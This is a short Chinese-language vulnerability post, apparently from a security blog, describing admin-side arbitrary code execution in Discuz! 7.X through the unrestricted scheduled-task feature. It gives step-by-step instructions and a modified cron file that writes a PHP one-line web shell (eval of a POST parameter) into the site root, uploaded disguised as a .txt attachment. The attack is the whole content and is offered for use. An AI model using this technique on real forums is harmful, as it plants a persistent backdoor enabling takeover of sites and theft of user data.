Discuz!7.X后台任意代码执行

  • A+
所属分类:漏洞时代
摘要

 由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行

 

Discuz!7.X后台任意代码执行

由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行

首先到全局附件设置修改上传目录

Discuz!7.X后台任意代码执行

然后直接拿他本身存在的计划任务件

/include/crons/announcements_daily.inc.php修改内容为[php]

<?php    /*  [Discuz!] (C)2001-2009 Comsenz Inc.  This is NOT a freeware, use is subject to license terms    $Id: announcements_daily.inc.php 17476 2008-12-25 02:58:18Z liuqiang $  */    if(!defined('IN_DISCUZ')) {  exit('Access Denied');  }    fputs(fopen('1.php','w'),'<?php eval($_POST[cmd)?>/r/n');    ?>[/php]
我是保存的11.txt,到论坛任意可以上传文件的板块发表新帖上传
Discuz!7.X后台任意代码执行
到后台在附件管理可以获得上传的路径和文件名
Discuz!7.X后台任意代码执行
我这里显示的是1307312134da261a93f37e3656.txt,记住这个文件名  把他写到计划任务里
Discuz!7.X后台任意代码执行
提交后点执行1.php就在根目录生成了

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: